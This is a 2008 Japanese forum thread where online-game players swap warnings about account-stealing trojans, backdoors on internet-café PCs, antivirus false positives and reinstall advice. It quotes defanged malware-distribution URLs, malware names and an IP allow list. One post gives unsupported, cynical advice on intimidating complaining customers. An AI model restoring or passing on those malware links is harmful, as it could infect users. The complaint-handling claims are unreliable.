店員含め誰が触ったかわからないんだからな。
会社名が出たからといってその他が安全な保証は一切無い。
どこの会社だから危ない、とかじゃなく全部に危険があると思ってた方がいい。 <> （○口○*）さん<>sage<>08/07/24 11:17 ID:KKaqu+Ut0<> この前アプレシオでもバックドア入ってたよ。
ネカフェでPC触るならスキャンは必要だね。 <> （○口○*）さん<>sage<>08/07/24 12:23 ID:1YSGeOM+O<> アプレシオの初期化ソフトは優秀な方だし、基本的に会員制な上にNODも入ってるからかなり安心出来る…と思ってたんだがなあ。 <> （○口○*）さん<>sage<>08/07/24 15:25 ID:GHgSKXIC0<> >>469
アプレシオは店にもよる
アプレシオって意外なことにFCが多いんだけど
直営・有力FC意外は注意した方がいい

iLOVE遊（だったかな？）の時代からFCやってるお店を利用してるけど
そこでもスタッフが居るフロア以外は極力利用しないようにしている

喫煙フロア（ダートやビリヤードと同じフロア）でフロントとは別の階の店があるけど
喫煙フロアのネトゲ席にUSB刺さってたのを見たことがある。
禁煙フロアはフロントに近いことも有って５席しかないけど基本ここを利用している

※新宿ハイジアは中国人が断られたのを見たことがある <> （○口○*）さん<>sage<>08/07/24 17:31 ID:Tz1Ji60s0<> mixiの一部コミュニティで

(RO)HiMEがLOD様をおいかけた
えっちてぃーてぃぴー://mx.ynjsj.コム/douga/stream/40354611815368.wmv.zip

ってトピックが立ってる。URLは変更してある。
DLしてみると、拡張子はzipだけど実際はRAR書庫で、中に入ってるのも
34sd6rtey6.wmv.exeって言うあからさまに怪しい実効ファイル。

ttp://www.virustotal.com/jp/analisis/254a771147a31db6f1a91ef0ccaac1aa

バカフィーやノートンでは検出できないみたいなので注意 <> （○口○*）さん<>sage<>08/07/24 18:00 ID:xsjPWWsL0<> >>471
カスペさんで見てみたら重複感染（2つ）
Backdoor.Win32.Agent.lzi
Trojan.Win32.Inject.dzc <> （○口○*）さん<>sage<>08/07/24 18:24 ID:VkWZDGE20<> それexe2匹をcab自己解凍で圧縮した上でUpackかけた奴だから
2匹捕獲できるのが正解。
VTとかではそゆの無理なのでバラせればいいんだけど…。 <> （○口○*）さん<>sage<>08/07/24 18:26 ID:VkWZDGE20<> あと一昨日あたりからRLPackを使うのが増えてきた。 <> （○口○*）さん<>sage<>08/07/24 20:12 ID:bmXRSAoQ0<> >>454
おれもネカフェでカスペルのオンラインスキャンかけたら
そんな感じのが引っかかったよ
調べようとしたけどウイルス辞典（？）などには該当無く
AVGを落としてスキャンしてみたけど
何も見つからなかったから誤検出かと思った

帰ってから一応PASSの変更はしたけどね

明日行ってみるつもりだから
同じ席にはならないだろうけど
もう一度カスペルでスキャンしてみるよ <> （○口○*）さん<>sage<>08/07/24 23:26 ID:G6L/4T/u0<> 転載だけど貼っていきますね。このヒトはクレームいれたのかな？

107 名前：（○口○*）さん[sage] 投稿日：08/07/24(木) 18:08 ID:khfaz7W70
1.5倍期間だし、待ち合わせ時間まですこし遊ぼうとネカフェに寄ったサボリーマンの俺。

利用店舗:ルシェルシェ高田馬場店(東京都)
利用席(ハイスペック・喫煙・オープン等):個室喫煙席
利用料金プラン:通常
キャンペーン(対象か):対象っぽい
PCスペック(CPU・メモリ容量・VGA等):不明
インストール・パッチ状況:最新
セキュリティ(環境復元ソフトの種別等):なし
ウィルススキャン結果:http://www.mmobbs.com/uploader/files/5254.png
ドリンク・アイス等:種類少なめ(無料)
食事:利用してない
分煙状況:喫煙BOX席・禁煙半オープン席(カーテンにて区切り)
備考: マウスカーソルが飛ぶ飛ぶ。
　　　…パックにしないでほんっとうによかった <> （○口○*）さん<>sage<>08/07/24 23:42 ID:ZsjZu1UJ0<> それをここで何を話し合えと…？ <> （○口○*）さん<>sage<>08/07/24 23:51 ID:bYDtp8fZ0<> ウイルス感染数No.1店舗を決めるんだな <> （○口○*）さん<>sage<>08/07/25 00:54 ID:867gv/5Z0<> セキュリティ情報としては有用だと思うけど。
騒ぎが大きくなれば、他の店舗もそういうのに注意払うようになるんじゃないかな。 <> （○口○*）さん<>sage<>08/07/25 02:21 ID:FKZlSpIxO<> 先日の者ですが、とりあえず自由空間の本社に怒鳴りながらクレーム言った。

なんかその場で謝罪され、さらに折り返し上司に連絡させます、言われ
あとでお偉いさんが謝罪してきたから「一発で信用失う真似すんな」と追い打ちかけといた。 <> （○口○*）さん<>sage<>08/07/25 04:13 ID:NNg0Xtp30<> >>480
これで尻に火がついて、少しは良くなるといいがな。 <> （○口○*）さん<>sage<>08/07/25 04:22 ID:ayC3MulP0<> >>480
気持ちはわかるが、怒鳴りながらっていうのはいただけないな <> （○口○*）さん<>sage<>08/07/25 05:35 ID:26RoU+Bh0<> サポセン業務やってる人間なら怒鳴り散らすの相手するのは日常茶飯事。
電話越しならなおさら怖くない。沸騰してるのを時間かけて冷ませばいいだけだしね。
本当に怖いのはキレたりせずに冷静に理詰めでクレームしてくる客。

ネカフェの本社のサポセンがどの程度の対応するのかは気になるなｗ
こういうケースは最近増えてきてると思うけど、各社のインシデント事後対応は
どこぞの糞会社を見習わないでほしいね。 <> （○口○*）さん<>sage<>08/07/25 09:00 ID:v7DRqBjg0<> >怖いのはキレたりせずに冷静に理詰めでクレームしてくる客
それはよく分かる。
ただでさえ抜け道が無いし、下手なことを言うと相手の持ち駒が増えるし。

でも、感情ぶつけられるのも苦手な人はいるもんよ。
まーそういうのはだいたい接客向かないんだけれどな。←自分のこと <> （○口○*）さん<>sage<>08/07/25 09:08 ID:tHsGoW1m0<> >>454と全く同じファイル名のやつ、俺も見つけたな。
ちなみに場所はやっぱり自遊空間。
長野の湖浜店と諏訪インター店の二店舗。
誤検知かと思ってたが違うのね・・・。
来週の頭当たりにまた行こうかと考えてたからそん時またスキャンしてみる・・・。

あ、ちなみにＲＯにログインすんのすっかり忘れてフジリュー版の封神演義見てた '`,､'`,､('∀`) '`,､'`,､ <> （○口○*）さん<>sage<>08/07/25 09:19 ID:8OgtT/jT0<> ヒトが怒る時って身を守る為が多いんだよね。
立場的に弱かったり自分自身の理不尽さを自覚していて、それを誤魔化す為に怒ったりする。
目の前にいたらキレて手が出るかもしれないから怖いけど、電話越しなら別に怖くはない。 <> 475<>sage<>08/07/25 09:46 ID:Mjifaf6FO<> 俺が行ったのも自遊空間だな
先月は何も無かったんだが…

これから行くんだけど、オンラインスキャンでカスペル以外におすすめってある？ <> （○口○*）さん<>sage<>08/07/25 10:04 ID:v7DRqBjg0<> オススメ聞くようじゃダメなんじゃないかな。
確からしい答えは聞き出せても、それは確かな答えではないよ。

たまに貼られているVTのリンクで、どこの対応が良いか見ておくとか。 <> （○口○*）さん<>sage<>08/07/25 11:29 ID:ayC3MulP0<> 怖い怖くないっていうより、表面上は謝って受け流されるのが多いって事
会社によってはクレーマー登録するところもあるし

今後に生かす生かさないかは会社次第でもあるけど <> 488<>sage<>08/07/25 11:44 ID:v7DRqBjg0<> これだけじゃなんなので。
特定のネトゲだけなら接続先がかなり限定されるので、
何らかの方法でそこ以外にセッションを張れないようにすればいい。

再起動で初期化されるネカフェPCで使えるいいソフトあるかな？ <> （○口○*）さん<>sage<>08/07/25 12:07 ID:HcfJcqis0<> そういう制御するためには結構下のレイヤに干渉しないといけないわけで。
ネカフェのPCでそういうレイヤをいじるための権限が付与されてたら、そういう制御を
ユーザができるとしたら、それだけで既に何でも仕込めるし再起動時の再初期かも回避可能な
状態であり、危険が危なくて(日本語としては間違ってるが)、ユーザ側で対策するとか以前の
状態だと思うぜ。 <> （○口○*）さん<>sage<>08/07/25 12:15 ID:v7DRqBjg0<> んーまあ確かにそれもそうだ。
せめてプログラム単位で通信を抑制できればいいんだけれど、
うまい方法ないもんだね。 <> 475<>SAGE<>08/07/25 12:44 ID:WkyBT0mr0<> ネカフェのPCのカスペルスキーオンラインスキャン終了

感染オブジェクト名ウイルス名前回の処理
C:\WINDOWS\system32\tevynhe.xlf 感染: Backdoor.Win32.Rbot.rdx スキップ

C:\WINDOWS\system32\tevzipp.xlf 感染: Backdoor.Win32.Rbot.rdx スキップ

という結果が出てきました。

ついでにAVGをおとしてかけてみたら上記の物はみつからず
代わりに

"C:\Program Files\NCSoft\Lineage II\system\l2.exe";"トロイの木馬Generic_c.SXT"

というものがかかりました。
こっちは誤検出か？

とりあえず店員に伝えてから帰ります。
夜勤明けなのでそろそろ眠気が・・・ <> 475<>SAGE<>08/07/25 13:35 ID:WkyBT0mr0<> 連レスごめん

今店員に見てもらった

どうやら店で使ってる自動復元のソフトがひっかっかてるんじゃないか？とのことで
確認にいってる。

待ち始めてそこそこ時間がたったけど結果が気になる・・・
どうしようかなぁ <> （○口○*）さん<>sage<>08/07/25 13:37 ID:cZyn4M/I0<> nProだろうね。しかし本物のウイルスを見逃してどうする…。 <> （○口○*）さん<>sage<>08/07/25 13:39 ID:YILLyPLF0<> 諦めたらそこで試合終了ですよ
俺なら帰るけど
とりあえずメ欄のsageは小文字でないとダメだ <> （○口○*）さん<>sage<>08/07/25 13:44 ID:HcfJcqis0<> 「諦めたら？そこで試合終了ですよ？」
って言われたことならある。 <> （○口○*）さん<>sage<>08/07/25 14:12 ID:v7DRqBjg0<> もうやめて！>>494のHPは0よ <> （○口○*）さん<>sage<>08/07/25 15:46 ID:QbCn0YGZ0<> avast!がROのファイル
rdefk.dfdに反応するので
カスペルスキーオンラインスキャンをかけてみたら
こっちは無反応だった

またavast!の誤認なのかなぁ… <> 475<>SAGE<>08/07/25 15:51 ID:WkyBT0mr0<> 結果がわかった
リカバリーソフトが原因っぽいけど
作成した会社と確認がとれないとれないとのこと

ほんとにバックドアである可能性があるので店内のPCからは削除するらしいです。

本社を介して他の店舗も削除作業をするんじゃないかな？

結果を待ってる間の分はただになりましたｗ

以上報告終わり。 <> （○口○*）さん<>sage<>08/07/25 15:51 ID:v7DRqBjg0<> avast誤爆多いよね
誤認識は、信頼性という意味ではすり抜けよりもたちが悪い。

ウイルス検出されて駆除したらアプリが壊れていた、とかね。 <> （○口○*）さん<>sage<>08/07/25 16:01 ID:QbCn0YGZ0<> >501
もうavastの誤認には散々煮え湯のまされてる。
そのくせ肝心のウィルスをスルーするからたまらない
カペルスキー製品版の導入を検討してる昨今。 <> 475<>sage<>08/07/25 16:50 ID:Mjifaf6FO<> >>496
あり？
どうりでスレがあがってるはずだorz

しかし、系列店の複数の店舗に同じようなのが仕掛けられたってことは
リカバリーソフトにあらかじめ仕掛けてあったってことか？

感染してるファイルの名称や数が異なっていたり、感染してないＰＣがある。とも言ってたんだよなぁ。

とりあえずパスワード変更してきます <> （○口○*）さん<>sage<>08/07/25 16:51 ID:v7DRqBjg0<> 最悪の場合、設置やメンテを行う業者が（またはその従業員が）仕込むって
事もあり得るよなぁ・・・。 <> （○口○*）さん<>sage<>08/07/25 17:01 ID:G7+DL06H0<> 導入業者がきっちりした作業手順を確立していなかったり、手抜きをしたのではなかろうか。
本来なら、更のマスタイメージに必要なアプリを追加して、それを複数台に展開するのが理想だが、単に運用中の環境に
復元ソフトを導入しただけで済ませた結果、マルウェア込みの環境のまま運用されてしまったとか。 <> （○口○*）さん<>sage<>08/07/25 17:07 ID:7r3/XTIo0<> 【　　　気付いた日時　　　　　】さきほど
【不審なアドレスのクリックの有無　】http://www■soultaker■biz/valhalla/
【他人にID/Passを教えた事の有無】なし
【他人が貴方のPCを使う可能性の有無】なし
【　　ツールの使用の有無　　　】なし
【　ネットカフェの利用の有無　　　】なし
【　　　 OS　　】XP
【使用ブラウザ】Firefox
【WindowsUpdateの有無】なし
【　アンチウイルスソフト】バカフィー
【その他のSecurty対策】なし
【ウイルススキャン結果】カスペルスキー・Ad-Aware検出なし。マカフィーは現在スキャン中
【スレログやテンプレを読んだか】今から
【hosts変更】なし
【PeerGuardian2導入】なし
【説明】wikiを見ていて不注意で踏んでしまいました
ポップアップがブロックされましたって出た段階で閉じました
検出はされなかったんですけど怪しさ満点だったので・・・ <> （○口○*）さん<>sage<>08/07/25 17:14 ID:7r3/XTIo0<> あ、ウィンドウズアップデートはやってます間違いました <> （○口○*）さん<>sage<>08/07/25 20:07 ID:867gv/5Z0<> このスレ見てると、オンラインスキャンで検出されないネカフェのほうが少ない気がしてくるわ <> （○口○*）さん<>sage<>08/07/25 21:34 ID:BkjOq7+B0<> >>480みたいな口先だけの謝罪対応で引っ込む馬鹿は楽でいいな
電話の向こうじゃニヤニヤしながら鼻毛抜いてるってのに

お偉いさんじゃなくて迷惑クレーマー対応部署に回されただけ
折り返し電話かける、ってのはブラックリストに名前入れるための口実
こんなこともわからないのばっかだとクレーム対応も楽でいいのに

理詰めで文句言ってると勘違いしてる阿呆はちょっと脅せばすぐひっこむ
どうとでも取れる言葉で威力営業妨害で訴えるよ、って臭わせれば一発
クレーマーなんて店に取っては百害あって一利なし
来なくなってくれれば最高

こういうとこに書き込んだら訴えるって取れる言葉を上手く織り交ぜるのがコツだね
一部上場企業のお客様相談（クレーマー対応）なんかはここらへんほんと上手くやる <> （○口○*）さん<>sage<>08/07/25 21:35 ID:/JNsNOt70<> スレ違い <> （○口○*）さん<>sage<>08/07/25 21:38 ID:z5+OwArw0<> どうせネット弁慶だろ <> （○口○*）さん<>sage<>08/07/25 21:39 ID:m9NDqfc80<> 言うまでもありません <> （○口○*）さん<>sage<>08/07/25 21:44 ID:m+frZ5HK0<> ＞折り返し電話かける、ってのはブラックリストに名前入れるための口実

これ知らないやつ多いね
ぽんぽん個人情報差し出して来るから笑える

ご利用になったと時間帯をお教え願えますか
折り返し店長からお電話させていただきますので、お客様のお名前とお電話番号をお願い致します

これで要注意の客リストに載せて終了
次からご入店の際には全店舗で名前が赤にて表示されます <> （○口○*）さん<>sage<>08/07/25 21:46 ID:/JNsNOt70<> http://enif.mmobbs.com/test/read.cgi/livero/1216046992/
ネカフェスレもう無いのかと思ったらまだあるじゃんか
関係ないネタはそっちでやってくれよ <> （○口○*）さん<>sage<>08/07/25 21:46 ID:KJx+0/Fg0<> クレーマー認定するようなネカフェだと、自分でバックドアとか仕込むことも考えられるね。
客が何してるか監視する名目でさ。
それでパスワードとか拾えたら、業者に売り込んで一儲け。

怖いね。 <> （○口○*）さん<>sage<>08/07/25 21:47 ID:NNg0Xtp30<> つまらん奴が偉そうな顔してやってくる <> （○口○*）さん<>sage<>08/07/25 23:20 ID:GsF4O/qv0<> スレが伸びてると思ったら、スレを機能停止に追いやりたい
中華が大量に沸いてたのか <> （○口○*）さん<>sage<>08/07/26 00:16 ID:0yzmNGGf0<> >>499
>>500
>>501
2週間ぶりに家に帰ってきてRoやる前にスキャンと思って
avastかけたら"rdefk.dfd"にトロイ検出されて戦々恐々してたら…
誤爆なのかナァやっぱり…
心臓に悪いから勘弁して欲しいよ… <> （○口○*）さん<>sage<>08/07/26 02:07 ID:3f9fqkhB0<> >>518
もともとnProが使ってる手段にはウィルスで使われるものが
多分に含まれてるから、そこを責めるのは筋違いだよ。 <> （○口○*）さん<>sage<>08/07/26 04:43 ID:3tty5RgI0<> nPro と Jword をマルウェア認定しないアンチウィルスには、どこか利権の臭いがします。 <> （○口○*）さん<>sage<>08/07/26 05:47 ID:LoGTV/yR0<> >>520
あなたが大人なら、それをやると次に何が起こるか想像しましょう。 <> （○口○*）さん<>sage<>08/07/26 11:48 ID:DEQHP1b50<> ソフトウェア発行者の身元とソフトウェアの目的がはっきりされているものまで弾くのは間違いだわな。
nProもJwordも普通のユーザーなら導入されることを知れるわけだし。
確かに利権には違いないが、普通にネット社会の仕組みに組み込まれるべきことだろ。 <> （○口○*）さん<>sage<>08/07/26 12:13 ID:3f9fqkhB0<> >>522
問題は、nProはしょっちゅう更新されるということだ。
パターンファイルで例外判定すればいいところだけど
パターン更新が追いついてないときに危険判定下すというのは
未知のウィルスへの防御が有効に働いているということ。 <> （○口○*）さん<>sage<>08/07/26 14:54 ID:xYpy5K5P0<> JWordと垢ハックとの関連をkwsk <> （○口○*）さん<>sage<>08/07/26 14:57 ID:olD0IAdF0<> >>522
nProはインストール時に、導入される事を一切報告しない。
アドウェアはnProとはジャンルが異なるが、インストールすることの許可を求める。 <> （○口○*）さん<><>08/07/26 16:24 ID:h8HAmUw40<> カスペはマスターオブエピックとか入ってるPCでも誤検出するな。
cgMoEDrv.dllだっけか。俺が働いてる店でもこれでクレーム受けた。 <> （○口○*）さん<>sage<>08/07/26 16:29 ID:K7iRW1b90<> それは以前あった症状でしょ
いまは誤検出していない <> （○口○*）さん<><>08/07/26 23:16 ID:8P8+T6xR0<> さっき情報漁ってたら下記サイトで検索文画面と全く違うサイトが…
www.ro-fivestars.org/archives/game/mmorpg/ro

マカフィーで安全となっていたので油断してましたが
もしかして引っかかってしまったのでしょうか？ <> （○口○*）さん<>sage<>08/07/26 23:21 ID:olD0IAdF0<> >>528
ドメイン失効 <> 528<><>08/07/26 23:25 ID:8P8+T6xR0<> >>529
ありがとうございます！
ということは、安心しておｋということですかね？
今後は慎重に踏みます… <> （○口○*）さん<>sage<>08/07/26 23:47 ID:waWaoDTA0<> ついでにテンプレ守っとけ <> （○口○*）さん<>sage<>08/07/28 00:38 ID:lXf/1xll0<> 【　　　気付いた日時　　　　　】先ほど
【不審なアドレスのクリックの有無　】記憶になし
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【　　ツールの使用の有無　　　】 No
【　ネットカフェの利用の有無　　　】 Yes(最後に使ったのは5月)
【　　　 OS　　】 WindowsXP Professional SP3
【使用ブラウザ】 Opera9.5
【WindowsUpdateの有無】毎月更新済み
【　アンチウイルスソフト】 avast!
【その他のSecurty対策】 Spybot,Ad-Aware
【ウイルススキャン結果】カスペルスキーで無Hit
【スレログやテンプレを読んだか】 Yes
【hosts変更】　有、一月ほど前に更新したきり
【PeerGuardian2導入】有
【説明】
2週間ほど前から220■73■222■254:80にアクセスしようとしてるのをPG2が遮断してるのに気付きました。
引っかかってるのはPG2の韓国リストみたいなんですが、
それ以上わからなかったので詳しい方に教えていただきたい次第です。 <> （○口○*）さん<>sage<>08/07/28 00:46 ID:hBykrbFx0<> 684 名前：既にその名前は使われています[] 投稿日：2008/05/18(日) 23:39:09.74 ID:sQ+opesg
220.73.222.254はニコニコみてるとアクセスしに行くんだけど、他の人も行くのかね？
ちなみにtubeplayerつこうてる
ブラウザでは一切見ない

685 名前：既にその名前は使われています[sage] 投稿日：2008/05/18(日) 23:43:24.53 ID:SK+ML50Y
>>684
ニコニコのアフィリエイトの画像はほとんどあっちの鯖のやつだから

ただブロックしてるってだけで気になるならPG2をもっとよく理解するべきだと思う
IPだって物によっては調べればすぐ出てくるわけだし <> （○口○*）さん<>sage<>08/07/28 00:49 ID:Q+m0rpZB0<> http://sky.geocities.jp/vs_ro_hack/ro_allow.txt

RAGNAROK-JP:61.215.212.0-61.215.212.255
RAGNAROK-JP2:61.215.214.128-61.215.214.255
WEB-SYSTEM:61.215.220.64-61.215.220.255
RAGNAROK-JP2:211.13.228.0-211.13.228.255
GUNGHO-MODE:211.13.229.0-211.13.229.255
RAGNAROK-JP3:211.13.232.0-211.13.232.255
RAGNAROK-JP4:211.13.235.0-211.13.235.255
GUNGHO-PAT1:219.123.155.160-219.123.155.191
GUNGHO-PAT1:221.247.195.160-221.247.195.191
GUNGHO-PAT3:125.101.19.64-125.101.19.95
GUNGHO-PAT4:124.32.117.192-124.32.117.22

これに、下記を追記（スクルド鯖で使用）

GET-AMPED:61.215.222.0-61.215.222.128 <> （○口○*）さん<>sage<>08/07/28 01:22 ID:lXf/1xll0<> >>533
なるほど、アファリ画像でしたか。ニコニコ見てない時間にもかなり多く弾いてたので(port2000~4000番台で続けて)
何か他のが取りに行ってるのかな？
ひとまず安心なようで、ありがとうございました。勉強してきます。 <> （○口○*）さん<>sage<>08/07/28 08:52 ID:Q8ouqaF+0<> 2ch専用ブラウザでjpgなどの画像のリンク先を直接開かなくてもある程度わかるように小さい画像で表示するものを使っているのですが
それが原因で感染する可能性ってありますでしょうか？ <> （○口○*）さん<>sage<>08/07/28 10:32 ID:b8kP8qDq0<> ↑で話題に出た自遊空間のtev～.xlfファイルですが
系列で使っているリカバリソフトをインストール時に作成されるファイルで
何も問題はないとのこと
以上参考までに <> （○口○*）さん<>sage<>08/07/28 12:20 ID:MiEgvLAk0<> RealPlayerに深刻な脆弱性、アップデートで対処
ttp://www.itmedia.co.jp/news/articles/0807/28/news009.html <> （○口○*）さん<>sage,<>08/07/28 20:11 ID:KPaGk1sU0<> 以前、ここで垢ハックされたときの相談をさせていただいた者です。
始まりの4/15日から、7/28日現在、補填をしてもらえることが決定しました。
復旧まで、1～2週間かかるみたいですが、何とか解決しました。このスレの
皆さんにはお世話になりました。ありがとうございます。

でも、補填って一人一回だけなんですね・・・　不正アクセスによる
復旧は一度限りと書いてありました・・次かかったらどうしよ・・・ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/07/28 20:14 ID:hVn+JLGp0<> >>534
こちらでも追加しました。
http://sky.geocities.jp/ro_hp_add/ro_tai01.html#PG2RO <> （○口○*）さん<>sage<>08/07/28 20:57 ID:Q+m0rpZB0<> >>539
お疲れ様でした。セキュリティソフトの導入と定期的なパターンの更新の他に、PG2等の予防策も
講じておくといいと思いますよ。

可能でしたら、経過報告や、警察で聞かれたこと、持っていったもの、最終的な対応などを書いて
頂けないでしょうか。今後の参考になると思います。 <> 539<>sage,<>08/07/28 21:08 ID:KPaGk1sU0<> 被害にあった翌日に警察署に→そこでキャラ名・所属鯖などその他もろもろを
担当の方に教える。それから、しばらく、音沙汰なし　それから、呼び出されて
調書をとり、ラグナロクに接続したIPのログなどを見せられる。この時点で
不正アクセスと立証できるが、捜査は終了していないので、まだ補填は不可

その後、中国からの接続と判明　捜査を断念　ガンホーが不正アクセスと判明しても
アイテムを返してくれるか不安だというと、担当の方がガンホーに確かめてくれたり
しっかりした対応をしてくれたと思います。ただ、数週間に一度は電話で進展あった
か、聞いたほうが早いと感じました。 <> （○口○*）さん<>sage<>08/07/28 23:02 ID:71/6Cq1K0<> >>536
原理的にはおそらく安全・・・なんだけどこれに限らず全てにおいて
可能性がないなんてことはありえない。
たとえばJPEG画像展開部分にセキュリティホールがあって
そこを突くjpgを読み込んでしまったらアウト。

だから安全を期したいのなら、余計なデータには触らないに限るよ。 <> （○口○*）さん<>sage<>08/07/29 05:52 ID:zRwPo768O<> >>499
なんか検索したら無害そうだったんで
放置してます <> （○口○*）さん<>sage<>08/07/29 09:23 ID:P/ysPlz60<> >>543
なるほど、一応原理的には安全なんですか。
しかし用心することに越したことはなさそうですね。
データが復旧されたら、念のため2chブラウザも変えてみようと思います。 <> （○口○*）さん<>sage<>08/07/29 11:17 ID:jZQ7ASam0<> >>538で指摘されている脆弱性を狙ってきたか、>>417の転送先が入れ代わっていた。
-> www■coconlovely■com/Blog/
--> www■coconlovely■com/Blog/06014■htm
--> www■coconlovely■com/Blog/0733■htm
--> www■coconlovely■com/Blog/realplay■htm
--> www■coconlovely■com/Blog/flash■htm
www■coconlovely■com/Blog/huohu5798592■swf

……ああ面倒。 <> （○口○*）さん<>sage<>08/07/29 11:31 ID:UWPE5fph0<> アカウントハック仕込みがだいぶ組織化してきたな。
ワンクリックで何でもできてしまう利便性が、逆にゼロデイ攻撃に利用される。 <> （○口○*）さん<>sage<>08/07/29 16:55 ID:5o8B4jWH0<> 近頃また増えてきたよなあ <> L ★<>sage<>08/07/30 01:17 ID:???0<> 50 名前：(^ー^*)ノ～さん[sage] 投稿日：08/07/30(水) 00:48 ID:ni9Ujz/H0
会員制の掲示板立ち上げました！

攻略系の内容はさすがに全てが全て書き込めるわけではないので ...

http://◆www◆livedoorm◆com◆blog.htm

----
ofsfb-18p2-25*.ppp11.odn.ad.jp <> （○口○*）さん<>sage<>08/07/30 01:20 ID:169Tk0wr0<> (ﾟдﾟ) <> （○口○*）さん<>sage<>08/07/30 01:26 ID:BYFgsSxU0<> 全く同じ物がアプリコットにも貼られていたな <> （○口○*）さん<>sage<>08/07/30 01:38 ID:WFIWLotK0<> 最近多いねlivedoorm。あとyouturebe。 <> （○口○*）さん<>sage<>08/07/30 11:59 ID:NY+eMJuJ0<> シマンテック、「ノートン2009」日本語ベータ版を無償公開
http://internet.watch.impress.co.jp/cda/news/2008/07/18/20308.html

話題になっていなかった気がするので一応。
2009はオンラインゲームを考慮したものになるとかいう話なので（↓）、
テスト環境のある方は自己責任でおためしあれ～。

2009年版は「パフォーマンスに影響が出ないソフト」に。セキュリティソフト大手
シマンテック，ゲームにフィーチャーしたセミナー開催
http://www.4gamer.net/games/001/G000183/20080604036/ <> （○口○*）さん<><>08/07/30 15:26 ID:FOkV0Q+T0<> すみません、質問させてください。
5日前のウイルスバスターの検索で、下のものがひっかかりました。トロイの木馬系のウイルスのようです。
karnaeghdrv.dll
TROJ_GAMETHIEF.M

隔離されているファイルを削除したのですが、今日の検索でもまったく同じものがひっかかりました。
とくに妖しいURLを踏んだりした自覚はないのですが、どこかで気づかずに踏んでしまっているようです。
最近はＲＯ関連サイトしか覗いてないのですが、これはアカウント関連のウイルスなんでしょうか？
分かる方がいましたら教えてください。 <> （○口○*）さん<>sage<>08/07/30 16:36 ID:ftWHSFm10<> バスターでひっかからないダウンローダが残ってるとかかもね。
複数のエンジンで（オンラインスキャンの活用で）検索する事をお勧めする。

アカハック関連というか、hostsファイル削除とかやってるようですし、RO単体が標的かどうかは
わかりませんが、(ROのアカハックトロイを含む）他の危険物を呼び込む可能性があります。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FGAMETHIEF%2EM&VSect=Sn

karnaeghdrv.dll自体は、リネージュのアカハックとか幾つかで用いられているようですので、
アカハックかと思われます。手動でファイルを削除する場合はセーフモードにする必要があるようです。

可能な限り、OSの再インストールコースで、確実に安全な環境を再構築すること。 <> 554<>sage<>08/07/30 17:38 ID:1G3J1ihrO<> 554です。一時ネット回線を切ったので携帯から失礼します。
>>555
丁寧にありがとうございます。
削除の際に、セーフモードにせずその場ですぐに消してしまったので、上手く削除できなかったのかもしれません。
セーフモードの状態でもう一度やってみます。

念のため、OSの再ｲﾝｽﾄｰﾙも行いたいのですが、行う際に注意することってあるでしょうか？
例えばﾊﾟｿｺﾝのデータが消えるからﾊﾞｯｸｱｯﾌﾟが必要とか。

再ｲﾝｽﾄｰﾙの手順は検索した情報でどうにかなりそうなのですが、ﾊﾟｿｺﾝの知識に疎くOSのｲﾝｽﾄｰﾙが何を意味するのか分らなくて・・・orz
家で共用のﾊﾟｿｺﾝなので、万が一にもﾊﾟｿｺﾝが使えなくなったりする様な事態は困るのですが。

それとも、こんなあやふやな状態でやるくらいなら、OSの再ｲﾝｽﾄｰﾙはしない方が良いでしょうか？

質問ばかりですみません。 <> （○口○*）さん<>sage<>08/07/30 19:14 ID:ftWHSFm10<> >>556
>例えばﾊﾟｿｺﾝのデータが消えるからﾊﾞｯｸｱｯﾌﾟが必要とか。
その通り。インストールの方法によっては消える可能性もありますので、データのバックアップをお忘れなく。
（置き場所やOS入れ直しの方法によってはデータが消えないものもあります。どこが消えるのかわからなければ
必要なデータはすべてバックアップを）

あとは、アプリケーションも（フォルダに残っていても、殆どの場合、起動しなくなっていますので）、すべて入れ直しに
なりますので、再インストール時は、アプリケーションのインストール用ディスク一式も用意しておきましょう。
各種ソフトのシリアルナンバーや、セキュリティソフトの認証IDとパスワード、メールソフトの設定などもすべて
やりなおしですので、必要なら事前にメモをとっておきましょう。ネットワーク接続の設定が必要な場合、
ISPの契約書類を発掘するか、自分で接続設定を控えておくと良いでしょう。

OS入れ直しの際に、プロダクトIDを入れないといけませんが、それが書いてある紙をなくしてしまった場合などは
PCが生きている間に（ツールなどを使用して）プロダクトIDを確認することが必要になるかもしれません。

OSを再インストールすれば、安全な環境になりますが、ウィルス等の悪意のあるソフトウエアの本体や
ダウンローダなどがHDD内に残っていると、事故で発動させてしまって（発動させるまでは安全な環境です）
元の木阿弥というケースもあります。

趣味で保存しておいたり、アカハックの証拠として保全しようという奇特な人でもない限りは
セキュリティソフトですべて削除してから行なうのが望ましいです。（HDDのフォーマットからやれば安心）
メーカー製PCのリカバリの場合、PC購入時の状態になる為、確実にデータも消えますのでご注意ください。

>家で共用のﾊﾟｿｺﾝなので、万が一にもﾊﾟｿｺﾝが使えなくなったりする様な事態は困るのですが。
…えー、再インストールに失敗した場合、PC起動しなくなりますので、OSの入れ直しを改めて行なう必要があります。

>それとも、こんなあやふやな状態でやるくらいなら、OSの再ｲﾝｽﾄｰﾙはしない方が良いでしょうか？
いいえ、やっちゃいましょう。PCを飛ばして（動かなくして）、復旧させることで、PCに関するスキルはアップします。
飛ばして覚えるMS-DOS…じゃないですが、そーゆーもんです。

再インストール前に、OSのSP適用済みディスクを作っておくと便利です。「SP+メーカー」を使ってみてください。
M/Bやビデオカードなどのドライバー類、（Intel製のM/Bなら）IAAなど、インストール時に必要になるデータも
一通り揃えて、CD-Rなどにまとめておきましょう。

細かい事はいろいろありますが、あとはやってみて覚えましょう。

家族と共用ということでしたら、家族のバックアップが必要なデータについても、きちんと確認しておきましょう。
うっかり消しちゃわないように。 <> （○口○*）さん<>sage<>08/07/30 19:17 ID:W9DIuhiS0<> 557はきっとB型だな。親切心と同時に執念を感じるぜｗ <> （○口○*）さん<>sage<>08/07/30 19:19 ID:ftWHSFm10<> ごめん、A型なんだｗｗｗ <> （○口○*）さん<>sage<>08/07/30 19:36 ID:Xk6kQloI0<> 血液型と性格に相関性がないからな。
「紫色の服着てる女は欲求不満」と言ってるのと大差ない。 <> （○口○*）さん<>sage<>08/07/30 23:36 ID:YRoyu8ZG0<> >>554
怪しいサイトにいかない、自覚がないっていう人に限って
